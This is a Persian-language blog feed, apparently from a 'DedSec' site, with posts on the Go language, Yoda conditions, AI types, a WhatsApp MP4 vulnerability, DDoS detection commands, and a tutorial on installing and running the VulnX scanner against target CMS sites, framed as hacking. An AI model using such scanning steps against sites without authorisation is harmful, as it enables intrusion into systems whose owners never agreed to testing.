D E D S E C



در این قسمت یعنی قسمت آخر مجموعه پست‌های آشنایی با زبان برنامه نویسی Go، با کتابخانه‌ها و ابزارهای مهم زبان گو آشنا می‌شویم، و در ادامه به روش یادگیری این زبان می‌پردازیم. با هیتوس همراه باشید.

کتابخانه استاندارد Go یکی از جامع ترین کتابخانه‌های موجود در بین تمام زبان‌های برنامه نویسی است. از طرفی چون Go یک زبان نو ظهور است، طراحی کتابخانه در حالت بسیار تمیز و یکپارچه‌ای قرار دارد.

Package‌هایی برای آرشیو و فشرده سازی: tar, zip, bzip2, flate, gzip, lzw, zlib

Package‌هایی برای رمزنگاری و عملیات هش: aes, cipher, des, dsa, rc4, rsa, md5, sha1, sha256, sha512, tls, x509

Package‌هایی برای کار با فایل‌های مختلف: base32 ,base64, binary, csv, gob, hex, pem, json, xml

Package‌هایی برای کار با گرافیک دو بعدی:  color, draw, gif, jpeg, png

Package‌هایی برای کار با مباحث شبکه: html, cgi, fcgi, mail, url, jsonrpc

ذات سیستمی زبان Go در اینجا مشخص می‌شود. تمام Package‌های بالا در Go نوشته شده اند. برای داشتن خیلی از این Package‌ها در زبان‌های دیگر، باید متوسل به کتابخانه‌های نوشته شده در زبان C می‌شدیم.

خوبی Go در این است که برای اعمال سطح پایین دیگر نیازی به C نیست. Go در واقع همان C مدرن است، از طرف همان کسانی که روزی C و Unix را به شما معرفی کرده بودند!

همه Package‌های بالا را همراه کنید با Package‌هایی برای عملیات ریاضی، زمان، و تاریخ، محیط سیستم عامل، پایگاه داده، ورودی و خروجی، رشته ها، پردازش و Parse کردن متن و .

در ضمن کتابخانه استاندارد با یک HTTP Server داخلی همراه است که به راحتی می‌توان آن را با Nginx یا Node.js مقایسه کرد. در واقع، اکثر سایت‌هایی که در ابتدای این نوشته به آن‌ها اشاره شد هم از همین Server داخلی برای خدمات رسانی به کاربرانشان استفاده می‌کنند.

همچنین در کتابخانه استاندارد Go یک سیستم Template Engine ارایه شده تا برنامه نویسی وب را برای شما آسان تر کند. با این حساب، احتمالا متوجه شده اید که برنامه نویسی وب در Go، نیاز چندانی به فریم‌ورک‌های مرسوم در زبان‌های دیگر نخواهید داشت. کتابخانه استاندارد Go همه چیز را از قبل برایتان مهیا کرده است.

از نظر مستندات، Go در جایگاه بسیار خوبی قرار دارد و برای تمام Package‌ها و تک تک توابع و پارامترهای شان به طور کامل مستندات وجود دارد.

اگر زبان انگلیسی شما در حد مطلوبی قرار دارد (که به عنوان یک برنامه نویس باید هم این چنین باشد) در زمینه یادگیری Go با هیچ مشکلی مواجه نخواهید شد و نیاز به هیچ کتاب و منبع خاصی نخواهید داشت؛ چرا کهمستندات موجود در سایت زبان به اندازه کافی کامل و مناسب است.

با این که زمان زیادی از انتشار نسخه پایدار نمی‌گذرد، اما Go ابزارهای جانبی نستباٌ کاملی در اختیار دارد:

ابزار Go که کار کامپایل و نصب Package را آسان کرده است. این ابزار حتی قابلیت این را دارد که Package‌ها را به صورت اتوماتیک از سایت‌هایی مثل Github دریافت و نصب نماید!

ابزار Godoc قادر است سایت golang.org را به صورت محلی در کامپیوتر شما اجرا کند. سایت اصلی golang.org هم به کمک همین ابزار در حال اجراست. همچنین godoc می‌تواند مستندات مربوط به Package‌ها و توابع آن‌ها را مستقیما در ترمینال نمایش دهد.

ابزار Gofmt استایل کد نویسی شما را مدیریت می‌کند. برای مثال هرکدام ازا عضای تیم می‌توانند استایل خودنویسی خودشان را داشته باشند، اما در نهایت از Gofmt برای یپارچه کردن استایل کدهای پروژه استفاده کنند.

ابزار Gocode هم برای کمک به ادیتورها و IDE‌ها طراحی شده. این ابزار بررسی کدهای شما اطلاعات موجود در آن‌ها را استخراج کرده و در اختیار ادیتورها و IDE‌های می‌گذارد. آن‌ها هم می‌توانند از این اطلاعات برای پیاده سازی قابلیت Auto completion استفاده نمایند.

مهم ترین ابزار کار هر برنامه نویس ویرایشگر متن است. خوشبختانه Go از پشتیبانی خوبی در این زمینه برخوردار است. در رابطه با ویرایشگرهای ساده و سبک، Go از Kate و Notepad++ و BBEdit و Gedit و . به صورت رسمی پشتیبانی می‌کند.

برای کسانی که با ویرایشگرهای حرفه‌ای کدنویسی می‌کنند، Go پشتیبانی رسمی و کاملی را برای ویرایشگرهای بی رقیب Vim و Emacs ارائه کرده است. در واقع از آنجایی که تیم سازندگان Go و اکثر جامعه کابران آن نیز با همین ابزارها کدنویسی می‌کنند، پشتیبانی از این دو از اولویت بسیار بالایی برخوردار است.

در Go همانند دیگر زبان‌های کامپایلری نیاز خاصی به وجود IDE حس نخواهید کرد؛ اما برای کسانی که کار با IDE‌ها را ترجیح می‌دهند، Go از پشتیبانی مناسبی برای IDE‌های Eclipse و Intellig برخوردار است.

از کجا کار با Go را شروع کنیم؟

مستقیم به سایت golang.org بروید و پکیج مربوط به سیستم عامل خود را دانلود و نصب نمایید. برای خواندن مستندات هم به قسمت Documents سایت بروید. این قسمت بسیار جالب دسته بندی شده است. برای آشنایی با Go کافی است به ترتیب لینک‌های این صفحه را از بالا به پایین مطالعه کنید. دقت کنید که رعایت ترتیب در خواندن لینک‌ها بسیار به شما کمک خواهد کرد.

dedsec will give you the truth

join us


در قسمت اول از سلسله پست‌های دنباله دار آشنایی با زبان Go به مباحث پایه‌ای و داستان شکل گیری این زبان پرداختیم. در این پست به جنبه‌های فنی تر از این زبان می‌پردازیم. در ادامه با ما همراه باشید.

در این پست با مطالب زیر آشنا می‌شوید:

  • کامپایل، کامپایلر، و سرعت کامپایل در زبان Go
  • کامپایلر‌های زبان Go در محیط‌های مختلف
  • Syntax زبان Go

Go یک زبان کامپایل شونده است

برای اجرای برنامه‌های نوشته شده در Go، باید آن‌ها را Compile نمایید. خروجی عملیات کامپایل، کد ماشین است. بدون نیاز به VM، بدون نیاز به JIT، و بدون نیاز به تفسیر. همانند C، حاصل برنامه شما مستقیما کدهای ماشین خواهد بود.

در حال حاضر کامپایلر Go که خودش در زبان C نوشته شده، قادر است برای پلتفرم‌های x86 و x86 و arm کد ماشین تولید کند. سرعت کامپایل شدن برنامه‌ها در Go بسیار بسیار بالاست! و در این زمینه جای هیچ رقابتی را برای دیگر زبان‌های کامپایلری مانند C++ و Java و C# و . باقی نگذاشته است.

خود کامپایلر نیز به صورت رسمی برای سیستم عامل‌های Linux و Mac و FreeBSD و Windows منتشر می‌شود. اما به شکل غیر رسمی، کاربران گزارش کرده اند که روی سیستم‌های دیگری مثل Android و Plane9 و بقیه BSD‌ها هم موفق به اجرای آن شده اند.

در Go نیاز به چیزهایی شبیه makefile‌ها و یا برنامه‌های مدیریت پروژه مثل Maven نیست. کامپایلر Go از فایلی که تابع main در آن قرار دارد شروع کرده و خودش بقیه کدهای مورد نیاز را شناسایی و لینک می‌نماید! حتی اگر یک برنامه چند صد هزار خطی با تعداد زیادی سورس فایل داشته باشید، فقط یک خط دستور ساده در ترمینال کافیست تا کل برنامه شما کامپایل شود.

لازم به ذکر است که کامپایلر Go کدهای شما را به شکل Static لینک می‌نماید. به این معنی که حاصل کامپایل برنامه شما در نهایت یک فایل اجرای یک تکه خواهد بود؛ مهم نیست که برنامه شما از تعداد زیادی فایل و یا Package‌های جانبی تشکیل شده، چیزی که در نهایت به شما تحویل داده خواهد شد یک فایل اجرایی ساده است که برای اجرا شدن هیچ پیش نیازی لازم ندارد و به راحتی قابل انتقال به دستگاه‌های دیگر است.

کامپایلر Go با کسی شوخی ندارد! چیزهایی که در زبان‌های دیگر باعث Warning می‌شوند، همگی در Go به عنوان Error در نظر گرفته شده اند. مثلا اگر یک متغیر تعریف کرده باشید اما از آن استفاده نکرده باشید، کامپایلر به جای یک Warning سطحی، با یک پیغام Error کل عملیات کامپایل را متوقف می‌کند! در Go چنین اشتباهاتی پذیرفتنی نیست!

Go و Syntax آشنا

Go زبانی است از خانواده C و به همین دلیل برنامه نویسانی که با C و ++C و Java و #C و PHP و JavaScript و . آشنایی دارند، بسیار راحت Syntax این زبان را یاد خواهند گرفت. برای مثال با کمی دقت در کد زیر، براحتی متوجه منظور آن خواهید شد:

package main
import "fmt"
func main(){
     a := [] int{11, 22, 33, 44, 55}
     s := 0
for i := range a {
     s += a[i]
}
fmt.Printf("%d \n", s)
}

Syntax یک زبان تاثیر زیادی در پیشرفت آن دارد. وقتی Syntax زبان آشنا باشد، برنامه نویسان راحت تر آن را یاد خواهند گرفت و به همین نسبت محبوبیت زبان بالاتر خواهد رفت. با بلا رفتن محبوبیت، سازندگان زبان با اشتیاق و سرعت بیشتری به کار توسعه مشغول می‌شوند. در این حالت ضریب اعتماد برنامه نویسان به زبان بالاتر می‌رود و کتابخانه‌ها و ابزارهای بیشتری برای زبان تولید می‌شود.

برنامه نویسان بیشتر از اینکه کد نویسی کنند، به کد خوانی مشغول اند. تا زمانی که Syntax یک زبان توسط برنامه نویسان پذیرفته نشود نمی‌تواند محبوبیت چندایی پیدا کند. برای مثال زبان‌های Functional با آن همه قابلیت‌های منحصر به فردی که دارند، در اکثر اوقات فقط به دلیل داشتن Syntax نا آشنا در رابطه با جذب برنامه نویسان با مشکل مواجه می‌شوند.

Syntax زبان Go را می‌توان ترکیبی از Syntax زبان‌های C و Python و Pascal به حساب آورد. سعی شده تا Syntax زبان کوچک، تمیز، و قابل فهم باشد. برای مثال ساختار حلقه در Go فقط با for پیاده سازی شده و حلقه‌های while یا do از آن حذف شده اند.

نکته جالب دیگری در مورد Syntax زبان Go این است که گرامر آن Regular است! و به همین دلیل پردازش کدهای Go برای ابزارهای جانبی مثل IDE‌ها بسیار آسان خواهد بود. همچنین Coding پیش فرض تمام سورس فایل‌های UTF-8 است! (Ken Thompson و Rob Pike خودشان خالق UTF-8 هستند.)

dedsec will give you the truth

join us


امروز  می‌خواهیم مطلب دنبال دار جذابی را با هم بخوانیم که شاید در کمتر جایی در اینترنت به آن پرداخته شده باشد. زبان Go زبان بسیار قدرتمند و پیشرفته‌ای است که در آینده‌ای نه چندان دور در بیشتر پروژه‌های موفق و بزرگ دنیا مورد استفاده قرار می‌گیرد. شاید تعجب کنید اگر بدانید Go در برخی خصوصیات خود 20 الی 50 برابر از زبان‌های دیگر بهینه تر و سریع تر است. در این پست اول از مجموعه پست‌های آشنایی با زبان Go با تاریخچه این زبان به صورت اجمالی آشنا می‌شوید.

در این پست با مطالب زیر آشنا می‌شوید:

  • طراحان و ابداع کنندگان زبان Go
  • اهداف طراحی این زبان
  • شرکت‌های بزرگی که از Go استفاده می‌کنند
  • مقایسه مختصری از زبان Go و زبان‌هایی مانند C++ و Ruby و Python و جاوا
  • شرکت پشتیبان از زبان Go
  • مجوزهای انتشار این زبان

نمودار مقایسه تعداد درخواست‌های زبان Go نسبت به سایر زبان‌ها در یک ثانیه

در سپتامبر سال 2007، Ken Thompson و Rob Pike، دو تن از سرشناس ترین چهرها‌های دنیای نرم افزار که نیازی به معرفی شان نیست، ایده ساخت یک زبان برنامه نویسی سیستمی جدید را با Robert Griesemer، یکی دیگر از مهندسین مشغول در Google در میان گذاشتند.

آن‌ها کار بر روی این زبان جدید را شروع کردند و در این مدت تعداد دیگری از همکارانشان همچون Russ Cox و Brad Fitzpatrick و Andrew Gerrand به تیم آن‌ها ملحق شدند.

در نوامبر سال 2009، اولین نسخه آزمایشی زبان با پشتیبانی گوگل به صورت متن باز به عموم برنامه نویسان عرضه شد. از آن زمان تا کنون بیش از 300 نفر از برنامه نویسان داوطلب در توسعه این پروژه شرکت داشته اند.

از اولین ماه انتشار این زبان، شرکت‌های Startup زیادی استفاده از آن را شروع کردند. با اینکه زبان در نسخه آزمایشی به سر می‌برد، اما برای خیلی‌ها وجود نام Jeb Thompson و Rob Pike کافی بود تا از کیفیت زبان اطمینان حاصل کنند.

شرکت‌های بزرگ تر اما، منتظر نسخه پایدار ماندند. تا اینکه در ماه مارس سال 2012، نسخه 1.0 از زبان برنامه نویسی Go به صورت پایدار منتشر شد.

در زیر لیست تعدادی از شرکت‌های استفاده کننده از این زبان را می‌بینید:

  • Google
  • YouTube
  • BBC
  • Canonical
  • Nokia Siemens
  • Bitly
  • Heroku
  • CloudFlare
  • SmugMug
  • Feedbooks
  • Iron.io
  • Moovweb
  • AirBrake
  • Swirl.us
  • SoundCloud

تقریباً در تمام اسامی بالا، از Go برای طراحی سیستم‌های Back-end استفاده شده است. جایی که زبان‌های اسکریپتی قدرت مناسب را ندارند و معمولا از JVM استفاده می‌شود؛ در خیلی از مواقع هم برای رسیدن به سرعت بالاتر، پای کدهای c و C++ به میان می‌آید.

فکر نمی‌کنم در تاریخ زبان‌های برنامه نویسی بوده که توانسته باشد فقط با گذشت 7 ماه از انتشار اولین نسخه پایدارش، با چنین مقبولیتی روبرو شود.

مسلم است که Go هنوز در اول راه است، و برای رسیدن به جایگاه زبان‌هایی مثل C++ و Java و Python و. راه درازی در پیش دارد، اما به نظر می‌رسد که برای شروع بسیار موفق عمل کرده است.

Go یک زبان مدرن و همه منظوره است

Go زبانی است که برای نیازهای امروز برنامه نویسان طراحی شده است. تمامی سعی طراحان بر این بوده که بتوانند تناسبی بین قدرت، سرعت و سادگی ایجاد کنند. ایده‌هایی که در آن بکار رفته با دقت و وسواس زیادی انتخاب و پیاده سازی شده اند. طبق گفته تیم توسعه، بر سر بعضی از قابلیت‌های زبان تا یک سال بحث و تبادل نظر صورت گرفته است.

Rob Pike عنوان می‌کند که ایده اولیه آن‌ها ساخت یک زبان سیستمی بود که بتواند جایگاه مناسبی برای C++ باشد. در روزهای اول، حتی سایت پروژه هم Go را به عنوان زبانی برای برنامه نویسی سیستم معرفی می‌کرد. اما با گذشت زمان متوجه شدند که تاکید آن‌ها بر سادگی، باعث شده نظر برنامه نویسان زبان‌های سطح بالاتری مثل Python یا Ruby هم به Go جلب شود؛ این قضیه برای تیم توسعه هم جالب بود.

در واقع می‌توان گفت که Go با ظرافت فراوان قدرت و سرعت زبانی مثل C را با سهولت و سادگی زبانی مثل Python ترکیب کرده. به همین دلیل قادر است طیف بسیار وسیعی از برنامه‌ها را پوشش دهد، از برنامه‌های سیستمی گرفته تا برنامه‌های ساده چند خطی. چه کسی گفته که یک زبان سیستمی، حتماً باید سخت باشد؟

Go یک زبان (آزاد) و متن باز است

با اینکه Go مستقیما از طرف گوگل پشتیبانی می‌شود، ولی یک زبان کاملاً آزاد است و تحت کنترل هیچ شرکتی نیست. Pike اعلام کرده که برای اثبات این موضوع، از قصد هیچ لوگو‌ای از شرکت گوگل را در سایت این زبان قرار نداده اند!

این یعنی:

  • ت کاری و تجاری هیچ شرکتی بر آینده زبان تاثیر نخواهد گذاشت.
  • توسعه و بهسازی زبان با سرعت بیشتری انجام می‌شود.
  • همه می‌توانند به طور شفاف تمام مراحل توسعه را دنبال کنند.
  • کتابخانه‌ها و فریم ورک‌های متن باز بیشتری برای زبان وجود خواهد داشت.
  • و

dedsec will give you the truth

join us


در این مطلب قصد داریم شما را با عبارات شرطی Yoda در برنامه نویسی آشنا کنیم.

همه شما در زبانی مانند PHP از عبارت شرطی زیر استفاده می‌کنید:

if($Answer == False){
    echo "The answer to this question is False!";
}

عبارات شرطی Yoda زمانی برقرار می‌شود که شرط فوق را بر عکس و به شکل زیر استفاده کنید:

if(False == $Answer){
    echo "The answer to this question is False!";
}

حالا شاید بپرسین چرا این نوع تعریف شرط مهمه و براش حتی نام مجزا تعیین کردن؟

در عبارت‌های شرطی Yoda مقدار مقایسه شده پیش از علامت‌های مقایسه‌ای قرار می‌گیرد و منجر به کاهش اشتباهات برنامه نویسی و دریافت خطا می‌شود.

به عنوان مثال بسیاری از برنامه نویسان گاهی در برنامه‌های خود از = به جای == استفاده می‌کنند که منجر به برقراری همیشگی شرط خواهد شد. مثلا:

$number= 5;
if($number = 10){
    echo "Please Use Yoda condition";
}

اگر عبارت فوق را اجرا کنید در کمال تعجب (البته برای تازه کارها) کد فوق اجرا شده و عبارت Please Use Yoda condition به نمایش در می‌آید.

در شرط فوق وقتی برنامه به تفسیر شرط داخل if وارد می‌شود تصور می‌کند که باید متغیر $number را برابر 10 قرار دهد، و چون این عمل با موفقیت خاتمه پیدا می‌کند شرط درون پرانتز درست تفسیر می‌شود.

برای فراری از مشکل بحرانی فوق (بحرانی چون هیچ خطایی حین اجرا دریافت نمی‌کنید و ممکن است تا مدت‌ها با چالش مواجه شوید) از Yoda استفاده کنید تا برنامه حین رسیدن به این خط از شما خطا بگیرد و شما متوجه اشتباه خود شوید.

البته این نوع شرط گذاری تنها مختص زبان PHP نیست و در زبان‌های دیگر نیز می‌توان از آن استفاده کرد.

در wordpress به صورت پیش فرض از Yoda استفاده شده است. نمونه‌ای از شرط Yoda در wordpress:

if ( true == $the_force ) {
    $victorious = you_will( $be );
}

dedsec will give you the truth

join us


هوش مصنوعی به توانایی‌ای گفته می‌شود که به کامپیوترها برای کاربری بیشتر اضافه می‌شود. هر چند دانش هوش مصنوعی در ابتدای راه خود قرار گرفته است ولی پیش بینی‌ها از وقوع قریب الوقوع انقلابی در این زمینه حکایت می‌کنند.

در این مطلب با گام‌های برداشته شده برای هوش مصنوعی و انواع مختلف آن آشنا می‌شوید:

نوع اول: کاملا واکنشگر


ساده ترین نوع هوش مصنوعی است و برداشتی ساده و مستقیم از محیط و موقعیت دارد و بر اساس آن چه می‌بیند عمل می‌کند. این نوع هوش مصنوعی فاقد بینش نسبت به جهان اطراف است و هیچ نوع خاطره و حافظه‌ای ندارد و گذشته بر تصمیمات و عملکردش تاثیری نمی‌گذارد. این نوع هوش مصنوعی برای ساخت دستگاه‌های تخصصی در یک حوزه معین استفاده می‌شوند.

نوع دوم: حافظه محدود


این نوع هوش مصنوعی یک پله بالاتر از نوع واکنشگراست و با دارا بودن حافظه، داده‌های گذشته را در تصمیم گیری فعلی خود دخیل می‌کند. حافظه و تجربه این نوع هوش مصنوعی است به اندازه‌ای است که بتواند تصمیمات صحیح تری بگیرد و اعمال مناسبی را اتخاذ کند.

نوع سوم: نظریه ذهن


هوش مصنوعی در این نوع می‌تواند احساسات و افکاری که بر رفتار انسان اثر می‌گذارند را درک کند. این هوش مصنوعی می‌تواند احساسات، انگیزه‌ها و انتظارات را درک کرده و از نظر اجتماعی فعال باشد.

نوع چهارم: هوش مصنوعی خودآگاه


هوش مصنوعی خودآگاه خود دارای تصویر و تجسم است. این نوع هوش در واقعا تکامل یافته "نظریه ذهن" است و غیر از داشتن حالات روحی نسبت به خود نیز آگاهی و اطلاع دارد. در این سطح از هوش مصنوعی ماشین می‌تواند رفتار، احساسات و عکس العمل دیگران را پیش بینی کند. شاید آخرین مرحله هوش مصنوعی همین مرحله باشد که می‌تواند جهان را دگرگون کند.

لازم به ذکر است نوع سوم و چهارم تا کنون تنها در سطح نظری بوده اند و پیاده سازی نشده اند.

دستگاه‌های پیاده سازی شده با نوع اول کامپیوتر Deep Blue شطرنج باز است که توانست قهرمان شطرنج جهان کاسپاروف را شکست دهد.
برنامه AlphaGo شرکت گوگل نیز با این سطح از هوش پیاده سازی شده است.

دستگاه‌های پیاده سازی شده با نوع دوم ماشین‌های خودران و دستیارهای شخصی هستند.

از آن جا که نوع سوم و چهارم تا کنون مثال واقعی‌ای نداشته اند ولی در دنیای فیلم‌ها مثال‌هایی از آن‌ها موجود است. مثلا ربات Sonny در فیلم i robot و یا ربات‌های جنگ ستارگان از نوع سوم یا نظریه ذهن هستند.

ربات Eva در فیلم Ex Machina و ربات Synths در سریال Humans نیز از مثال‌های استفاده از هوش مصنوعی نوع چهارم و نوع خودآگاه هستند.

dedsec will give you the truth

join us


باگ spyware Pegasus در واتساپ

باگ جدید برنامه WhatsApp می تواند به هکرها اجازه دسترسی مخفیانه یا جاسوسی بر روی تلفن همراه کاربران دهد.

وبسایت خبری هکرنیوز اطلاع داده است که WhatsApp اخیراً یک آسیب‌پذیری حیاتی دیگر را برطرف کرده‌ است که می‌تواند به مهاجمان اجازه دهد تا دستگاه‌های مورد هدف را از راه دور به خطر بیاندازند و پیام‌های تلفنی و فایل‌های ذخیره‌شده در آن‌ها را به طور بالقوه به سرقت ببرند.

این آسیب‌پذیری که با عنوان CVE-2019-11931  شناخته می شود  یک مساله سرریز بافر مبتنی بر پشته است که در روش آسیب‌پذیر WhatsApp stream یک فایل MP۴ که منجر به حملات اجرای برنامه یا حملات کنترل از راه دور (RCE) می‌شود، قرار دارد.

برای (Exploit) بهره‌برداری از راه دور این آسیب‌پذیری، فرد مهاجم یا هکر نیاز به شماره‌ تلفن کاربر هدف دارد و در ادامه کار یک فایل maliciously از WhatsApp را برای آن‌ها ارسال می‌کند، که در نهایت می‌تواند برای نصب یک backdoor مخرب یا جاسوس افزار بر روی دستگاه‌های (Target) هدف مورد استفاده قرار گیرد.

این باگ واتساپ هم برای مصرف کنندگان و هم برای برنامه‌های سایر شرکت ها، از جمله گوگل آندروید، اپل iOS و مایکروسافت ویندوز تاثیر می‌گذارد.

با توجه به یک مشاوره منتشر شده توسط فیسبوک، که یک برنامه پیام‌ رسان محبوب است، فهرست نسخه‌های WhatsApp که تحت تاثیر این آسیب پذیری قرار گرفته اند را به صورت زیر شرح داده است.

  • قبل از نسخه اندروید  ۲٫۱۹٫۲۷۴
  • قبل از نسخه ۲.۱۹.۲۷۴ iOS 
  • قبل از نسخه Enterprise Client  ۲٫۲۵٫۳
  • قبل از نسخه ویندوز موبایل و شامل نگارش ۲٫۱۸٫۳۶۸
  • قبل از نسخه ۲٫۱۹٫۱۰۴ Business for Android
  • قبل از نسخه ۲٫۱۹٫۱۰۰  Business for iOS 

دامنه، شدت و تاثیر آسیب‌پذیری برطرف شده جدید شبیه به آسیب‌پذیری تماس تلفنی (Voip) اخیر WhatsApp است که توسط گروه NSO شرکت اسرائیلی برای نصب spyware Pegasus  در حدود ۱۴۰۰ دستگاه آندروید و iOS در سراسر جهان مورد بهره‌برداری قرار گرفت.

در همین حال، اگر شما هم به عنوان یکی از هدف های مورد آسیب پذیری باشید و یک فایل ویدیویی غیر منتظره را بر روی WhatsApp از افراد نامشخصی در ماه‌های اخیر دریافت کرده‌اید، باید بررسی های لازم را برای مشاهده اختلالات در تلفن همراه خود انجام دهید و اقدامات لازم را برای از بین بردن آن به کار ببرید.

آسیب‌پذیری WhatsApp MP۴ تنها دو هفته پس از اینکه فیس بوک از گروه NSO برای سو استفاده از سرویس WhatsApp برای هدف قرار دادن کاربران آن شکایت کرد، رخ داد.

بروزرسانی اخیر اپل به دلیل باگ Spyware Pegasus

آپدیت اپل
باگ واتساپ

فایل های گیف GIF امروزه در بیشتر جاها مثل یک وبسایت و یا شبکه های اجتماعی از قبیل تلگرام و واتساپ و فیسبوک وجود دارد که توسط کاربر برای بروز یک احساس به مخاطبینش از تبریک سال نو تا صبح بخیر گفتن های روزانه به کار می رود. حال اینکه این فایل می تواند مخرب باشد و در واتساپ اجرا شود و به تمام سطوح مختلف تلفن همراه مثل دوربین، خواندن حافظه SD Card، پیام ها و… دسترسی کامل یابد.

WhatsApp RCE Vulnerability چگونه کار می کند؟

WhatsApp از کتابخانه تجزیه در سوال برای ایجاد یک پیش‌نمایش برای پرونده‌های GIF استفاده می‌کند وقتی که کاربران گالری دستگاه خود را قبل از ارسال هر فایل رسانه‌ای به دوستان یا خانواده خود باز می‌کنند.

بنابراین، لازم به ذکر است که آسیب‌پذیری با فرستادن یک پرونده GIF خراب به یک قربانی تحریک نمی‌شود؛  در عوض زمانی اجرا می‌شود که قربانی به سادگی گالری WhatsApp picker را باز می‌کند، و سعی می‌کند هر پرونده رسانه‌ای را برای کسی بفرستد.

dedsec will give you the truth

join us


تست نفوذ و هک cms با VulnX

امروزه سیستم های مدیریت محتوا یا همان CMS ها به قدری پیشرفت داشته اند که بسیاری از وب سایت های دنیا از CMS های اختصاصی بی نیاز شده اند و به همین خاطر که سایت های بسیار زیادی از ان ها استفاده می کنند. همیشه اسیب پذیری ها و روش های نفوذ در ان ها به دلیل تمرکز بیشتر هکر ها بر روی این CMS های معروف بیشتر است و ابزار های زیادی برای پیدا کردن ان ها ساخته شده اند که ما در این اموزش می خواهیم یکی از بهترین این ابزار ها را به شما معرفی کنیم.

معرفی ابزار VulnX

این ابزار یک اسکنر امنیتی بسیار هوشمند برای پیدا کردن اسیب پذیری های وب سایت ها با CMS های معروف است، که از ان می توانید برای جستجو اسیب پذیری و پیدا کردن انواع باگ ها استفاده کنید و مزیت ان این است که به صورت متن باز بوده و مناسب برای سیستم عامل های لینوکس و ویندوز است.

برخی امکانات ابزار

  • امکان تشخیص سیستم مدیریت محتوا
  • امکان استفاده از ابزار برای جمع اوری اطلاعات و اوسینت
  • دسترسی خودکار در صورت اسیب پذیری
  • پیدا کردن ساب دامنه های وب سایت
  • اسکن پورت های سرور
  • ….

اموزش نصب و استفاده از ابزار برای تست نفوذ و هک CMS

برای نصب vulnx وارد ترمینال لینوکس شوید و با دستور زیر ابزار را از لینک گیت هاب ان دریافت کنید :

git clone https://github.com/anouarbensaad/vulnx.git

بعد از دریافت کافیست با دستور cd و نام دایرکتوری به ، دایرکتوری vulnx بروید :

cd vulnx

برای نصب ابزار باید فایل install.sh را اجرا کنید، اما قبل از ان باید اجازه دسترسی اجرایی را به فایل دهید :

chmod 775 install.sh

حال می توانید به صورت زیر فایل نصبی را برای تست نفوذ و هک cms اجرا کنید تا نصب ابزار اغاز شود :

install.sh/.

برای اجرا هم کافیست دستور vulnx را در ترمینال لینوکس خود وارد نمایید.

نکته : برای اجرای ابزار در ویندوز کافیست از لینک گیت هاب ابزار که در اخر اموزش قرار داده شده است ان را دریافت کنید و از طریق cmd فایل پایتون ان را با دستور زیر اجرا نمایید؛ دقت داشته باشید ابزار با پایتون نسخه 2 نوشته شده است.

python vulnx.py

نحوه استفاده از vulnx

بعد از اجرا ابزار و تست نفوذ برای هک cms ها سویچ های راهنمای ان را مشاهده خواهید کرد.

برای مثال به دستور زیر توجه کند :

vulnx -u site.com -w -d –dns –output /root

در ابتدا vulnx اجرا شده است و با سویچ -u ادرس سایت یا cms مورد نظر که قصد هک و یا تست نفوذ ان را داریم وارد می کنیم ، سویچ -w از وب سایت مورد نظر اطلاعات جمع اوری می کند ، -d ساب دامنه های وب سایت را پیدا می کند و در سویچ –dns تمامی dns های وب سایت را دریافت می کند که در اخر با –output تمامی گذارش ها را در مسیر مورد نظر ما ذخیره می شوند.

مثال برای اشنایی با نحوه هک cms با ابزار VulnX
مثال برای اشنایی با نحوه تست نفوذ و هک cms با ابزار VulnX

dedsec will give you the truth

join us


DDOS یا DOS حملاتی هستند که باعث از دسترس خارج شدن سرور و یا سایت می شوند که به ان ها حملات تکذیب سرویس هم می گویند، به طور کلی در صورتی که حمله از طریق چندین سیستم و سرور انجام شود DDOS می گویند و در صورتی که از طریق یک سیستم یا سیستم های کمتری انجام شود حملات DOS می گویند.

نحوه تشخیص و چک کردن حملات دیداس

این حملات انواع مختلفی دارند که هر کدام ممکن است از روش های متفاوتی باشند ما در این اموزش مهم ترین بخش های سرویس ها را برای برسی امنیت ان ها و جلوگیری از دیداس خواهیم گفت. دقت داشته باشید برای برخی از این روش ها نیازمند سطح دسترسی بالا در سیستم عامل سرور هستید.

پینگ

یکی از رایج ترین حملات از طریق ارسال پکت بزرگ به صورت پینگ است که شما می توانید برای برسی ان دستور زیر را در ترمینال یا Cmd ویندوز خود بزنید تا ببنید سرویس شما پینگ دارد یا خیر در صورت نداشتن احتمالا حمله از طریق پینگ بوده و باید پینگ سرور را ببندید.

ping ip -t

حمله به پورت های مهم سرور

در اولین قدم پورت های باز اضافه سرور را مسدود کنید و در قدم بعدی اتصالات پورت را چک کنید :

ss -tan state established | grep :80\|:443” | awk ‘{print $4}’| cut -d’:’ -f1 | sort -n | uniq -c | sort -nr

با استفاده از دستور بالا تمامی ای پی های متصل به پورت 80 و 443 را

  5 توزیع لینوکس شبیه ویندوز

می توانید برای چک کردن حملات دیداس مشاهده کنید،

و در صورتی که ای پی حمله کننده را مشاهده کرده اید ان را از طریق فایروال مسدود کنید.

برای انجام این کار در ویندوز از دستور زیر با استفاده از netstat اتصالات پورت 80 را چک کنید :

netstat -n | grep :80 |wc –l

برسی لاگ ها برای چک کردن حملات دیداس

نکته : در صورتی که به سرور دسترسی ندارید ان را از طریق پنل مدیریت خودبرای کاربران مسدود کنید و به صورت لوکال متصل شوید تا بتوانید از این روش استفاده کنید در برخی موارد هم امکان دسترسی به سرور را خواهید داشت اما بخش هایی از ان از دسترس خارج شده است که در این صورت چک کردن حملات دیداس و جلوگیری از ان راحت تر خواهد بود

برای تشخیص حملات دیداس می توانید به لاگ فایل های سرور مراجعه کنید که محل هر کدام از ان ها بسته به نوع وب سرور شما متفاوت است و باید ان را جستجو کنید و بعد از پیدا کردن ان بیشترین ای پی هایی که در خواست فرستاده اند را مسدود کنید. برای جستجو لاگ فایل ها می توانید از دستور زیر استفاده کنید.

locate access.log

برخی روش های امنیتی برای جلوگیری از حملات دیداس

  • استفاده از فایروال های مناسب
  • کنترل دائم سرور
  • مانیتورینگ سرور برای چک کردن حملات دیداس
  • برسی لاگ ها به صورت دوره ای
  • استفاده از کلودفلر

نتیجه گیری

در دنیای اینترنت مشکلات امنیتی بسیار زیادی وجود دارد و به همین خاطر دائما ممکن است در خطر این حفره های امنیتی باشیم یکی از حملات رایج هم میتوان گفت حملات دیداس است که باید به موقع دشخیص داده شوند و از ان جلوگیری شود ما در این اموزش به موارد امنیتی برای چک کردن حملات دیداس پرداخته ایم.

dedsec will give you the truth

join us


نصب لاراول را در این پست به شما آموزش می‌دهیم. شاید اولین سورسی که در هر زبان برنامه نویسی و یا فریمی نوشته می‌شود سورسی است که متن معروف Hello World را چاپ کند. در این پست به عنوان اولین پروژه در لاراول Hello World را چاپ می‌کنیم.

پیش نیازهای نصب لاراول عبارتند از:

